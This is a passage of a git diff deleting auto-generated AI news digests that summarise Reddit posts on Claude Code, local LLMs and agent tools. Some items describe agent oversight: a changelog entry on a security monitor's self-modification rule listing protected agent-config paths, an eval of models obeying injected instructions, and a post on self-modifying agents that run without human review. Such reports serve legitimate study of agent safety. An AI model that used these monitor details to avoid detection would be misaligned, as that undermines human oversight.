**Models are improving but others are catching up** Opus 4.7 wasn't a big upgrade, and "Mythos" still isn't public. Competitors are closing fast, and switching is one click away. If a new model launched tomorrow at 80% of Claude's quality and 3% the cost, I'd hesitate. But at 95% quality and 50% cost? I'd switch the same day. And so would everyone else paying enterprise rates. 2. **Limited revenue sources** Of that $30B ARR, the open guess is 60%+ comes from Claude Code and developer API. That's a single customer segment, and it's the exact segment OpenAI, Google, and every well-funded s… - ---- - -## [Markdown browser for LLMs](https://reddit.com/r/LocalLLaMA/comments/1t9tsro/markdown_browser_for_llms/) -*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 -Tags: mcp, cli_tool - -> I built a markdown web renderer for AI agents. Instead of taking expensive screenshots and piping them through vision models, TextWeb renders web pages as markdown that LLMs can reason about natively. Full JavaScript execution, interactive elements annotated. It provides a CLI and an MCP server. You can find it here: [https://github.com/woheller69/textweb](https://github.com/woheller69/textweb) The LLM can do things like: navigate a web page, scroll up/down, enter text into input fields, click buttons, etc. Works with llama.cpp web UI. It is based on [https://github.com/chrisrobison/textweb](https://github.com/chrisrobison/textweb) which has a text grid renderer instead of markdown. - ---- - -## [I upgraded my Agent OS to a local 35B model and its code failure rate dropped to 0%](https://reddit.com/r/ClaudeAI/comments/1t9tqz6/i_upgraded_my_agent_os_to_a_local_35b_model_and/) -*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I’ve been obsessed with autonomous agents lately, but it got tiring when they keep hitting walls because they didn't have the right "tools" or because their context window turned to mush after an hour. 
I’ve found that local multi-agent systems where agents are driven by an aversive state (a suffering system) to autonomously write, sandbox, and hot-load their own tools so they don't hit walls has worked quite well. When an agent encounters something it hasn’t seen before, it builds a new tool for the job, tests it in a sandbox, registers it, lets the other agents know, then keeps rolling. It’s able to build an infinite library of anything it may need in the future, completely autonomously without a human ever in the loop. Repo: [https://github.com/ninjahawk/hollow-agentOS](https://github.com/ninjahawk/hollow-agentOS) *Isn’t letting local LLMs write their own code at runtime going to get too chaotic and brick the OS fast?* With a small model (like the 9B fallback), possibly. Under high system stress, a 9B model panics. It rushes, hallucinates invalid function calls, and tries to force broken syntax past the gates. But I just scaled the default runtime engine to **Qwen 3.6 35B A3B**… - ---- - -## [Natural Woman V2 - Z Image Turbo Lora](https://reddit.com/r/StableDiffusion/comments/1t9oono/natural_woman_v2_z_image_turbo_lora/) -*Reddit r/StableDiffusion* | 11/05/2026 | Score: 1.00 -Tags: github_release, tool_update - -> Hey all, I finally got around to training a new version to my natural woman lora. The point being to fix the actor face that ZIT can tend to produce. The first version was ok but there were many cases where the image produced was lack luster or downright bad. This version accomplishes the goal while not corrupting the model. Download it here: [https://civitai.com/models/2207094?modelVersionId=2935386](https://civitai.com/models/2207094?modelVersionId=2935386) Only thing is, models tend to look back over shoulder even when prompted to face forward. I'm pruning the dataset to train a 2.1 version to fix this so look out for that. Also, while I've found that the actor face does not affect men as much as woman, I am training a natural-men lora as well. 
Look out for that soon. - ---- - -## [I have to pretend I hate image generation AI to avoid getting banned or insulted on 99% of Reddit or the internet, even though Stable Diffusion is actually what I like and am most excited about right now. Why do people hate AI so much, esp…](https://reddit.com/r/StableDiffusion/comments/1tahphc/i_have_to_pretend_i_hate_image_generation_ai_to/) -*Reddit r/StableDiffusion* | 11/05/2026 | Score: 1.00 -Tags: open_source - -> I'm not even saying I care if they know the difference between open-source and closed-source image-generating AI, or if they insult me ​​or not. What I want to know is why so many people hate AI, especially image-generating AI. At first, I thought it only bothered artists, because they're afraid their artwork will be stolen or something. Then I thought it might also bother those who are afraid of not being able to distinguish AI from reality. But it's practically 99% of people who hate AI, and I just can't understand why. - ---- - -## [Sibling to Anthropic's Claude FM — where Claude FM curates, WRIT-FM operates](https://reddit.com/r/ClaudeAI/comments/1tagr4x/sibling_to_anthropics_claude_fm_where_claude_fm/) -*Reddit r/ClaudeAI* | 11/05/2026 | Score: 1.00 -Tags: cli_tool - -> Anthropic shipped `/radio` this week - Claude Code now has a lofi button that opens Claude FM, a stream curated by human musicians. I'll use it. I built WRIT-FM - a 24/7 AI radio station where every layer is model output, not a hand-picked playlist: * **Music**: AI-generated. No catalog, no human picks. Tracks produced per show by ACE-Step via a local music-gen server. * **Talk**: Claude CLI writes the hosted breaks - deep dives, news analysis, panel debates, listener mailbags, music essays. Kokoro TTS speaks them in 5 distinct voices. * **Hosts**: The Liminal Operator (philosophy), Dr. Resonance (music archaeology), Nyx (night/dreams), Signal (news analysis), Ember (soul/groove). They rotate across 8 shows. 
Sundays at 18:00 a Listener Hours mailbag replaces the regular slot. * **Broadcast**: ezstream → Icecast → Cloudflare tunnel → optional YouTube RTMP relay. * **Operator**: a Claude Code agent on a 15-minute loop. Health-checks the encoder, stocks music and talk segments for upcoming slots, turns listener messages into on-air responses, grows per-station topic banks when scheduled focus areas thin out, and writes *intent cards* that steer specific upcoming segments. The piece I… - ---- - -## [prompt caching, but for rl training - 7.5x speedup on long-prompt/short-response workloads](https://reddit.com/r/LocalLLaMA/comments/1tage06/prompt_caching_but_for_rl_training_75x_speedup_on/) -*Reddit r/LocalLLaMA* | 11/05/2026 | Score: 1.00 -Tags: open_source - -> most open source RL engines pack sequences naively: prompt + response, repeated for every sample in the group. this is fine for short prompt, long completion workloads but inefficient for long prompt, short completion workloads. with 1000-token prompts and 100-token responses at G=8, you're processing 8800 tokens when only 1800 are unique. about 5x wasted compute. the fix is conceptually simple: compute the prompt once, then compute all G responses after it. it's analagous to inference prefix caching, except training needs gradients to flow back through the prompt, which breaks causal attention in the obvious implementation. getting it right required different tricks for full vs. linear attention layers. you can read about it in the blogpost in the comments. 
Numbers on Qwen3.5-4B: \- 16k prompt / 64 out → 7.5x \- 16k / 128 → 7.3x \- 16k / 1k → 5.4x \- 8k / 4k → 1.7x - ---- - -## [GitLab announces workforce reduction and end of their CREDIT values](https://about.gitlab.com/blog/gitlab-act-2/) -*Hacker News* | 11/05/2026 | Score: 1.00 -Tags: product_launch - ---- - diff --git a/data/digest-2026-05-12.md b/data/digest-2026-05-12.md deleted file mode 100644 index 92ddd5e..0000000 --- a/data/digest-2026-05-12.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-12** | 15 stories | Auto-generated from 612 archived stories - ---- - -## [TUI to actually see what Claude Code is doing: cost, loops, tool commands…](https://reddit.com/r/ClaudeAI/comments/1tb669z/tui_to_actually_see_what_claude_code_is_doing/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 -Tags: mcp, open_source, cli_tool - -> I was running blind watching Claude Code work, could not tell where my money was going, when it was stuck in a loop, or what it was doing with my filesystem. So i built something open source to make it visible. works with Claude Code, Codex CLI, Gemini CLI, Cursor, and any MCP server. 
A scan of my own machine for the last 90 days showed what i do been missing: \- $14K spend across 39 sessions \- 129 agent loops, \~20% wasted iterations (mostly Edit-in-circles on the same 5 files) \- 3 credential leaks in tool input (JWTs, GitHub tokens, GCP keys) \- 5 sensitive paths an AI could reach at any moment (\~/.ssh, \~/.npmrc, gcloud creds) \- 2 dangerous commands node9 would have blocked Now i can: \- See where my money is going in real time \- Catch the most dangerous commands before they finish running \- Stop or continue a run while it's happening \- Analyze the data after the fact, any time range The live dashboard: \- High level: cost, tokens, command counts, all live \- Notifications: loops + critical commands surface here so i can make a call before things go sideways \- Live feed: the commands Claude is running right now \- Live security: dangerous actions the AI is taking \- Liv… - ---- - -## [I built a Mac app that turns Claude Code agents into live radio stations | Free & open source](https://reddit.com/r/ClaudeAI/comments/1tasoqo/i_built_a_mac_app_that_turns_claude_code_agents/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 -Tags: open_source, cli_tool, agent_tool - -> **TL;DR:** Agent FM is an open-source Mac app that lets you tune in to your Claude Code and Codex agents while they work, so you can stay in the loop and hear their progress live. Each agent gets its own live radio station. You can tune in to one agent, or listen to a Global Mix across all active agents. It surfaces progress, blockers, decisions, errors, and attention requests in real time. GitHub: [https://github.com/agentfm-ai/agent-fm](https://github.com/agentfm-ai/agent-fm) Hey everyone! How do you stay in the loop when multiple AI coding agents are running at the same time? That was the problem I kept running into. At some point, it became normal to have several Claude Code and Codex sessions running at once across different repos. Sometimes 8-10. 
The agents move quickly, but staying on top of them still means reading terminal transcripts across a bunch of windows. That workflow was broken in a very specific way: * I would miss which agent was blocked. * I would miss which one needed approval. * I would lose track of which files changed. * I would have to context-switch between terminals just to answer "what is this agent doing right now?" * The agents could run in parallel,… - ---- - -## [Steam Recommender using similarity! (Undergraduate Student Project) [P]](https://reddit.com/r/MachineLearning/comments/1tb8k3n/steam_recommender_using_similarity_undergraduate/) -*Reddit r/MachineLearning* | 12/05/2026 | Score: 1.00 -Tags: github_release, tool_update - -> (DISCLAIMER: I accidentally deleted the last post on this subreddit my apologies if this is your second time seeing it) Last year I made a [post](https://www.reddit.com/r/datascience/comments/1lkjxmr/steam_recommender_using_vectors_student_project/) about my steam recommender The last one was great and served its purpose of showing many people new games, But this new version is much more functional! I love making recommendation systems that tell the user WHY they got the recommendation. During a steam sale event, I always find myself trying to look for new video games to play. If I wanted to find a new game I would try to whittle it down by using steam tags, but the steam tag system is very broad "action". could apply to many many games. That got me thinking, what aspects do I like about my favorite games? Well I like Persona 4 because of the city vibes and jazz fusion, Spore because of the unique character creation and whimsical theme. Balatro for its unique deck building synergies. 
What if I could capture unique tags that identify a game that aren't just "action" and put them into vectors to show the (focus) of a game For example I could break persona 4 into something like Game… - ---- - -## [Elgato Stream Deck Usage Plugin](https://reddit.com/r/ClaudeAI/comments/1tb6exu/elgato_stream_deck_usage_plugin/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Wanted an easier way of keeping an eye on my usage, so created this plugin for the Elgato Stream Deck. Five keys, exact percentages from your account: current 5-hour session, weekly all-models, weekly Sonnet, weekly Claude Design, monthly extra credits. Each shows a reset countdown. Tap any key to open the Settings page directly. It calls Anthropic's own usage endpoint with the OAuth token Claude Code already stores locally — same data the Settings page shows, no separate API key, nothing leaves your machine. Windows + Mac, classic Stream Decks (MK.2 / XL / Mini / Neo). One-click installer + source: [https://github.com/Darhkfox/streamdeckclaude](https://github.com/Darhkfox/streamdeckclaude) *Caveat: the endpoint is undocumented so Anthropic could break it. Works fine today.* Enjoy! (also the first time i've used github so hope all works fine!) - ---- - -## [Can we acknowledge that Anthropic watches open sourcers and copies them?](https://reddit.com/r/ClaudeAI/comments/1tayk1l/can_we_acknowledge_that_anthropic_watches_open/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 1.00 -Tags: mcp, open_source - -> I’ve been seeing over the past few months an interesting phenomenon, an open sourcer makes a tool or MCP < Anthropic adds functionality for that exact thing a couple weeks later < repeat. The biggest examples are Openclaw (like 5 features, including cowork), persistent memory across chats, and latest example of the “goal” feature being added. This is obvious and I’m not really saying anything that’s revolutionary here, I’m sure we’ve all noticed it. 
My larger observation, no credit is given, they’re just copying and then providing a direct replacement for things open sourcers thought of. At this level, we’re all learning from each other. AI like it is right now is very new and you could even argue that they’re not copying, that we’re all just thinking the same things. The deeper issue though is that this shows a dystopian effect of AI, the big companies get the credit widely for things others have done. More people have heard about Claude cowork than have heard about Openclaw, and the result of the guy who made it was getting a job at OpenAI. He wasn’t able to make this into a business, it’s not how open source has been for the past 20 years where an idea can be copied but n… - ---- - -## [Cache-testing software for LLM-provider-style tiered ephemeral caches? [D]](https://reddit.com/r/MachineLearning/comments/1tayaiw/cachetesting_software_for_llmproviderstyle_tiered/) -*Reddit r/MachineLearning* | 12/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> I'm looking for a cache simulator / benchmark suite suited to the kind of tiered ephemeral cache that LLM providers use — e.g. Anthropic's 4-tier prompt cache, where context sits across several tiers with different residency windows, costs, and eviction rules. I've already tried **libCacheSim**. It's a solid piece of software for classical caches (LRU, FIFO, ARC, SIEVE, S3-FIFO, W-TinyLFU, Belady oracle, plugin API, trace replay), and I got a plugin + synthetic trace working against it. 
But it seems fundamentally aimed at single, flat caches: * One cache, not a hierarchy of tiers with different costs * No notion of partial / multi-tier residency of the same object * Misses are uniform-cost — no way to express "miss to L1 vs miss to L3 vs full recompute," which is the whole point in LLM prompt caching * Trace model is atomic get/put, not edit streams where cached objects mutate in place * No first-class support for token-weighted object sizes So it works as a baseline comparator, but it's not really the right shape for evaluating LLM-cache policies. **Does anyone know of cache-testing software specifically targeting LLM-provider-style caches?** Something that models multiple tiers… - ---- - -## [Claude MCP integration made my old meeting notes actually useful again](https://reddit.com/r/ClaudeAI/comments/1tb2ns8/claude_mcp_integration_made_my_old_meeting_notes/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 0.99 -Tags: mcp, tool_update - -> I’ve been testing the new Claude MCP integration with Bluedot and it changed how I use meeting notes completely. Before this, most meeting transcripts just sat there after the call. Now I can chat with all my past meetings directly inside Claude, pull context from old discussions, search decisions, action items, summaries, recordings, and combine that with info from other tools too. What I like about Bluedot is that it stays out of the meeting itself, no bot joining the call, but still captures everything cleanly in the background. The searchable meeting history is honestly the biggest feature for me now. Anyone else experimenting with Claude MCP workflows yet? - ---- - -## [Converted Karpathy's coding skill from Pro to free plan. Here's the full thing:](https://reddit.com/r/ClaudeAI/comments/1tavcuo/converted_karpathys_coding_skill_from_pro_to_free/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 0.99 -Tags: api_update, cli_tool - -> The Karpathy coding skill is locked behind Pro. 
It doesn't use any Pro-only features, so I rewrote it for free plan chat workflows. Same philosophy, tuned for no terminal, no subagents, and a shorter context window where mistakes are expensive. Paste the whole thing into a Project's custom instructions or use it as a system prompt. It auto-triggers on any coding request. --- name: karpathy-coding description: Apply Karpathy-inspired coding discipline to any programming task. Use this skill whenever the user asks you to write, fix, refactor, extend, or review code — even casually ("can you add X", "why is this breaking", "clean this up"). Also trigger when the user pastes code and asks a question about it, when they describe a feature or bug, or when they use words like "implement", "build", "add", "fix", "change", or "improve" in a technical context. This skill is especially valuable on the free plan where mistakes are costly because regenerating and iterating burns the context window fast. compatibility: claude-code opencode --- # Karpathy Coding Guidelines Derived from Andrej Karpathy's observations on LLM coding pitfalls, adapted for chat-first workflows (no terminal, no subage… - ---- - -## [What MCP servers are you guys using for persistent memory?](https://reddit.com/r/ClaudeAI/comments/1taq1ub/what_mcp_servers_are_you_guys_using_for/) -*Reddit r/ClaudeAI* | 12/05/2026 | Score: 0.96 -Tags: mcp, tool_update - -> Getting really tired of pasting the same project docs into claude every morning. I started testing the recall MCP integration to pipe my saved pdfs and web clips directly into my editor so claude actually has long-term context on what i'm building. It works pretty well, but i'm wondering what other tools you guys are using for MCP memory right now? Just trying to see what the standard stack is for keeping claude grounded. 
- ---- - -## [I realized character consistency breaks after the first few images](https://reddit.com/r/StableDiffusion/comments/1tb281q/i_realized_character_consistency_breaks_after_the/) -*Reddit r/StableDiffusion* | 12/05/2026 | Score: 0.90 -Tags: open_source, cli_tool - -> I was trying to make the same character show up across a few different scenes last week, and the first image looked fine. Then I tried changing the setting, the lighting, the pose, and the mood a little. Not even anything extreme. Just enough to make the character feel like they were doing something else. That was where everything started to drift. The face was almost right, but not really. The outfit changed in tiny ways. One reference worked better than another, but I forgot which one I used. A prompt line from yesterday gave better results, but it was buried in a different chat. I had drafts in one folder, references in another, and “final” images that were not really final. At some point I realized the problem was project memory. For one image, a good prompt or LoRA can be enough. For a repeatable character series, I need a way to keep the character, references, prompts, sessions, and generated artifacts together, so I can come back tomorrow and still know what happened. That is what we have been testing with OpenMelon. It is an open-source content-creation agent that runs in the terminal. 
It is not an image model and it is not trying to replace SD, ComfyUI, LoRAs, or whatever… - ---- - -## [My First Official AI Research Paper Accepted on SSRN](https://reddit.com/r/LocalLLaMA/comments/1tbht4h/my_first_official_ai_research_paper_accepted_on/) -*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 -Tags: product_launch - -> https://preview.redd.it/oz4vpoxdfs0h1.jpg?width=910&format=pjpg&auto=webp&s=fa4c91aad0e3c56850fbfc06099e9c4095712bbd Today, my research paper **“Stable Training with Adaptive Momentum (STAM)”** was officially accepted on **SSRN** — marking my first documented and official publication as an AI Researcher. The paper introduces a new optimization algorithm for deep learning training that outperformed several popular optimizers in selected benchmarks, addressed multiple training stability challenges, and achieved up to **50% reduction in computational training cost** in some experiments. This is an important milestone in my research journey, and I’m excited to continue exploring optimization techniques for efficient and stable AI training. You can read the paper here: [https://papers.ssrn.com/sol3/papers.cfm?abstract\_id=6699059](https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6699059) - ---- - -## [What solutions are you using to boost TPS and Context Window?](https://reddit.com/r/LocalLLaMA/comments/1tbe3yz/what_solutions_are_you_using_to_boost_tps_and/) -*Reddit r/LocalLLaMA* | 12/05/2026 | Score: 1.00 -Tags: api_update - -> **Server Specs:** 16 Gigs DDR5 AMD Ryzen 5 7600X 4.7 GHz 6-Core Processor AMD Radeon Sapphire Nitro+ 7900XTX NZXT N7 B650E ATX AM5 Motherboard **Performance:** I'm running Qwen27b Q4 at 80k context on a Sapphire Nitro+ Radeon 7900XTX 24Gb at 40 t/s. My setup is Llama.cpp + Vulcan. **Question:** I've been having a blast with it, but it's time for some extra power under the hood. 
The return rate is just slow enough to be annoying with tooling, and the context window is just short enough to not handle low-end big tasks. In a perfect world I'm running 120-140 Context at 60t/s. Hardware upgrades aside, what are some software changes that you guys have found that work? - ---- - -## [How many years do you think we are from making feature films at home?](https://reddit.com/r/StableDiffusion/comments/1tbdxnw/how_many_years_do_you_think_we_are_from_making/) -*Reddit r/StableDiffusion* | 12/05/2026 | Score: 1.00 -Tags: open_source - -> What would be your LLM(AI) Stack? Also Tools/Github repos? How long would it take to complete a feature film(60-90 mins) approximately? * Image Models : ??? * Audio Models : ??? * Video Models : ??? * LoRA/Finetunes/Workflows/etc., : ??? * Tools/Github Repos : ??? * Misc : ??? For Non-AI, we have so much FREE / Open source Tools. Sharing the stack I collected for my future short filmmaking. * (Raster) Image : GIMP, paint.NET, Pinta * (Vector) Image : Inkscape, Karbon, LibreOffice Draw * Painting : Krita * Animation : Blender, Krita, Synfig, Pencil2D, TupiTube, Pivot Animator * Audio Editing : Audacity, Ardour * Video Editing : OpenShot, Shotcut, Kdenlive, Davinci Resolve * Video : HandBrake * Digital compositing : OpenShot, Shotcut, Blender, Natron * Writing : FocusWriter, Manuskript, yWriter * Screenwriting : Trelby, Celtx Randomly found [this (2+ years) old thread](https://www.reddit.com/r/StableDiffusion/comments/18kfoln/how_many_years_do_you_think_we_are_from_making/) (Nice thread & comments) which forced me to post this thread Even without AI, some filmmakers already made films alone(except few stuffs like Voice-overs or editing), talking about animation films here. 
Shari… - ---- - -## [Chroma1-HD Character Transfer with Flux.2 Dev](https://reddit.com/r/StableDiffusion/comments/1tbdj5o/chroma1hd_character_transfer_with_flux2_dev/) -*Reddit r/StableDiffusion* | 12/05/2026 | Score: 1.00 -Tags: open_source - -> [Chroma1-HD with Flux.2 Dev character transfer](https://preview.redd.it/ptcx9u60kr0h1.png?width=1920&format=png&auto=webp&s=f1616927e93b3300a7416d5758198b42f8ce4c81) This workflow gives multi-modal capabilities to open-source image models. In particular, this workflow combines a text-to-image workflow (Comfy's official Chroma1-HD workflow) and an image-to-image workflow (Comfy's official Flux.2 Dev workflow). Link to workflow: [https://huggingface.co/ussaaron/workflows/blob/main/chroma\_flux\_character\_transfer.json](https://huggingface.co/ussaaron/workflows/blob/main/chroma_flux_character_transfer.json) This workflow is the final result of a ton of experimentation to solve one problem: Using an image reference for a consistent character kneecaps the creativity of an image model. For example, if I want to create a cool cinematic shot with a specific style, including an image reference will reduce the image model's style output into a pretty narrow lane. Generally, the final image will share most of the stylistic elements present in the character image and that's not ideal. I selected the models for this workflow, because after a ton of testing, I determined that they… - ---- - -## [Vulkan or CPU llama cpp backend for local llm for coding/code assist](https://reddit.com/r/LocalLLaMA/comments/1tbb762/vulkan_or_cpu_llama_cpp_backend_for_local_llm_for/) -*Reddit r/LocalLLaMA* | 12/05/2026 | Score: 1.00 -Tags: developer_tool - -> Hi all I recently started a new job and we're doing python development for a ci cd metadata consolidation library for analytics and we cannot use no stuff like claude code or codex or gh copilot or any model APIs (free or paid). 
I got a laptop with 32gb dual channel ddr5 5200mt/s RAM and i7 13gen 1365u running ubuntu. Now I tried so so many things firstly running llamacpp vulkan for qwen 3.5 9b q5 (got OOM'd somehow on ingesting a 340 line file while I set it up with a 24k context limit) then I tried gh copilot with ollama (ew but curiosity got the better of me but I couldn't get it to chat with code on the same qwen model). Tried Continue dev extension (OOMs and chat windows non responsive) and llama cpp vs code extension (chat window never showed up to work but the localhost url was live) I tried LMStudio and now it kinda works with qwen 3.5 4b q5 and qwen 3.5 9b q5 on CPU backend with the Roo extension on VS code rn but I'm thinking there has to be a better way to do things locally? Codebase is being demoed in 2-3 weeks for MVP so no one's adding wild new features but we're refactoring and a few files are 6000ish lines of test cases in pytest. I got a bunch of questions but I g… - ---- - diff --git a/data/digest-2026-05-13.md b/data/digest-2026-05-13.md deleted file mode 100644 index e36aff8..0000000 --- a/data/digest-2026-05-13.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-13** | 15 stories | Auto-generated from 656 archived stories - ---- - -## [I'm cooked. Anthropic just split "--print" mode to $/mo credits](https://reddit.com/r/ClaudeAI/comments/1tcetsd/im_cooked_anthropic_just_split_print_mode_to_mo/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: api_update, developer_tool, cli_tool, tool_update - -> So, my entire project concept of an autonomous self-monitoring self-orchestrating Kanban production system for Claude Code to live within has now potentially been torpedoed. I built the entire system on the premise that \[tickets + agents + hooks + executors -> "claude -p" -> hands-free always-on productivity\]. 
Now that Anthropic has announced that "claude --print" will, from June 15 forward, be considered "programmatic" SDK usage, all jobs launched using "--print" will get billed on a separate monthly credit bucket, and not be covered by the Pro/Max CLI tokens. This means that the $100 monthly credit, which will dry up quick, is effectively a stop-gap measure against those of us who realized early that you didn't need to run Claude Code yourself, you just needed an AI harness that would run Claude Code for you. It was a workaround for API-like control without API billing. Yet another AI gravy-train ride has come to an end. Boooooo. Unless... share your workaround ideas below! - ---- - -## [TextGen is now a native desktop app. Open-source alternative to LM Studio (formerly text-generation-webui).](https://reddit.com/r/LocalLLaMA/comments/1tbyyee/textgen_is_now_a_native_desktop_app_opensource/) -*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 -Tags: product_launch, open_source, tool_update - -> Hi all, I have been making a lot of updates to my project, and I wanted to share them here. TextGen (previously text-generation-webui, also known as my username oobabooga or ooba) has been in development since December 2022, before LLaMa and llama.cpp existed. In the last two months, the project has evolved from a web UI to a **no-install desktop app** for Windows, Linux, and macOS with a polished UI. I have created a very minimal and elegant Electron integration for that. (Did you know LM Studio is also a web UI running over Electron? Not sure many people know that.) https://preview.redd.it/tk8oibhgjw0h1.png?width=1686&format=png&auto=webp&s=95c70f769766466885c8fdc6e7211525a371a920 It works like this: 1. You download a *portable build* from the [releases page](https://github.com/oobabooga/textgen/releases) 2. Unzip it 3. Double-click textgen 4. A window appears There is no installation, and no files are ever created outside the extracted folder. It's fully self-contained. 
All your chat histories and settings are stored in a `user_data` folder shipped with the build. There are builds for CUDA, Vulkan, CPU-only, Mac (Apple Silicon and Intel), and ROCm. Some differentiat… - ---- - -## [Cross devices agent memory and context management?](https://reddit.com/r/ClaudeAI/comments/1tbuwkm/cross_devices_agent_memory_and_context_management/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: api_update, cli_tool, tool_update - -> Hey, developers. Imagine you have 2 macs, one at your job, one at your home. Also you use codex and claude agents at same time, maybe one by one for what sort of tasks or issues. You have both of claude and chatgpt 20$ plan together, not API. How you guys are managing cross devices agent memory and context management? You tasked one agent, he did the job. You go home, continue working from different devices such as mac mini m4 16gb. You pull changes from github/gitlab. Start vscode, open terminal, type "codex" or "claude". New session, new agent knows nothing about what other agent in other device. Of course, maybe in-project [AGENTS.md](http://AGENTS.md) or [CLAUDE.md](http://CLAUDE.md) exists, maybe some latest "CHANGELOG" markdown file, or maybe even "HANDOFF.md" for what another session, another agents had been worked on. Maybe these markdowns are not enough for longer terms. I just wanna learn how others (10x devs) tackling such problem/worklow? - ---- - -## [The Trillion-Parameter Dilemma: MiMo-V2.5-Pro went open-source (1.02T params). Is self-hosting worth it when the API costs $70 for 387M tokens?](https://reddit.com/r/LocalLLaMA/comments/1tbtinr/the_trillionparameter_dilemma_mimov25pro_went/) -*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 -Tags: api_update, open_source, tool_update - -> Xiaomi open-sourced MiMo-V2.5-Pro. 1.02 trillion parameters, 42B active (MoE), 1M context, MIT license. On paper, this is exciting. In practice, I'm stuck on the math. 
**What I've been doing with it** I've been running V2.5-Pro via the API through Claude Code for autonomous coding sessions, not one-shot prompts, but extended multi-hour runs where the model picks its own tasks, debugs its own code, and keeps going across sessions using file-based memory. Over \~125 sessions it built a full SaaS product from an empty repo: interactive API cost calculator with real-time pricing across 33 models and 10 providers, serverless API endpoints, Stripe checkout integration, embeddable widget system, RSS feed, newsletter infrastructure, SEO with structured data, and 60+ pages of content. 301 commits, all autonomous. It also ran quality audits on its own output: found issues across multiple files and fixed them without being asked. https://preview.redd.it/yuxs21bl7v0h1.jpg?width=384&format=pjpg&auto=webp&s=30ee7e8294f303d382e8312beb6d1bedbc9ef3de This isn't "generate me a landing page." It's sustained autonomous development where the model maintains context across sessions, manages… - ---- - -## [Simplified usage notes for the Agent tool - what's new in CC 2.1.140 (+622 tokens)](https://reddit.com/r/ClaudeAI/comments/1tbldw4/simplified_usage_notes_for_the_agent_tool_whats/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: mcp, product_launch, agent_tool - -> * NEW: Tool Description: Agent (simple usage notes) — Simplified usage notes for the Agent tool covering when to delegate, fork behavior, resumption, worktree isolation, background execution, parallel launches, and context restrictions. 
* Agent Prompt: Security monitor for autonomous agent actions (second part) — Expands the Self-Modification rule from a vague description to an explicit list of agent-config paths (.claude/settings.json, CLAUDE.md, CLAUDE.local.md, .claude.json, .claude/rules/, .claude/hooks/, .claude/commands/, .claude/agents/, .claude/skills/, .claude/output-styles/, .claude/workflows/, .claude/routines/, .claude/scheduled\_tasks.json, .claude/loop.md, .mcp.json), and carves out exceptions so files under .claude/worktrees/<name>/ are treated as ordinary project files and a project-specific .claude/ subdirectory outside the listed paths is not Self-Modification on its own. * Agent Prompt: Worker fork — Minor wording cleanup: drops "in your system prompt" from the "default to forking" reference so the rule applies generically to parent guidance. * Tool Description: Snooze (delay and reason guidance) — Adds an explicit warning not to schedule short-interval wa… - ---- - -## [Context Is Not Control, a source-boundary eval for LLMs](https://reddit.com/r/LocalLLaMA/comments/1tcb4r7/context_is_not_control_a_sourceboundary_eval_for/) -*Reddit r/LocalLLaMA* | 13/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> I’ve released a short paper / eval write-up called Context Is Not Control. The core idea is simple, LLMs don’t only fail because they lack context, they also fail when they treat the wrong context as controlling evidence. A retrieved document, prior message, user framing, fake authority claim, stale policy, or injected instruction - all can enter the context window, but not everything in context should be allowed to govern the answer. That distinction is a source-boundary problem. 
The paper focuses on cases where a model sees multiple pieces of text but has to preserve the difference between: \* evidence \* user framing \* quoted material \* source text \* instruction-like contamination \* unsupported claims \* authoritative-looking but invalid context So the question, “did the model have enough context?”, instead becomes, “did the model correctly identify which context was admissible as evidence?” I think this is especially relevant to local/open model evaluation because it is a failure mode that can be tested across a spectrum of context formats. It’s also not dependent on frontier-model access. The paper is not claiming to solve hallucination. It makes a narrower argument that… - ---- - -## [What kinds of models are people training with document data? [P]](https://reddit.com/r/MachineLearning/comments/1tc92u9/what_kinds_of_models_are_people_training_with/) -*Reddit r/MachineLearning* | 13/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> We've helped some folks with synthetic data for a number of different projects and some of them for "document data". Like annotated PDFs, PNGs. Tax forms, health forms. Especially things with PII that are hard to get because of obvious privacy concerns. So, we came up with an engine to build a simulation and then extract the data from that simulation. We're trying to make sure our pipeline fits into a normal training pipeline, so I'm curious about your workflows or training pipelines. Today we output in formats consistent with FUNSD, BIO, YOLO (like v5 and higher), Donut, COCO, etc. Are we shooting for the right stuff, or are people training for something different that could use a different format or ontology or something? Other things we're trying to figure out are like is a PyPi SDK package useful, do people just use the API and not care, shut up and give me a zip file? 
:-) - ---- - -## [A new monthly Agent SDK credit for Claude plans](https://reddit.com/r/ClaudeAI/comments/1tc6nah/a_new_monthly_agent_sdk_credit_for_claude_plans/) -*Reddit r/ClaudeAI* | 13/05/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Starting June 15, paid Claude plans can claim a dedicated monthly credit for programmatic usage. The credit covers usage of: * Claude Agent SDK * `claude -p` * Claude Code GitHub Actions * Third-party apps built on the Agent SDK We've heard your questions about SDK and `claude -p` usage sharing your subscription rate limits with Claude Code and chat. Starting June 15, programmatic usage gets its own dedicated budget instead. Your subscription limits don't change, they're now reserved for interactive use. How it works: Claim the monthly credit once, and programmatic usage will draw from it automatically. When it runs out, you can keep going with usage credits (billed at API rates you turn on/off). If usage credits are turned off, usage pauses until the credit resets. Monthly credit amounts vary by plan: * Pro: $20 * Max 5x: $100 * Max 20x: $200 * Team Standard: $20/seat * Team Premium: $100/seat * Enterprise: Varies by seat type After you claim the credit, it resets with each billing cycle. Credits do not rollover. This means that third-party tools built on the Agent SDK like Conductor and OpenClaw work with your Claude plan, but will draw from your credit the same way your own scr… - ---- - -## [Anthropic launches Claude For Legal with practice-area plugins and MCP connectors 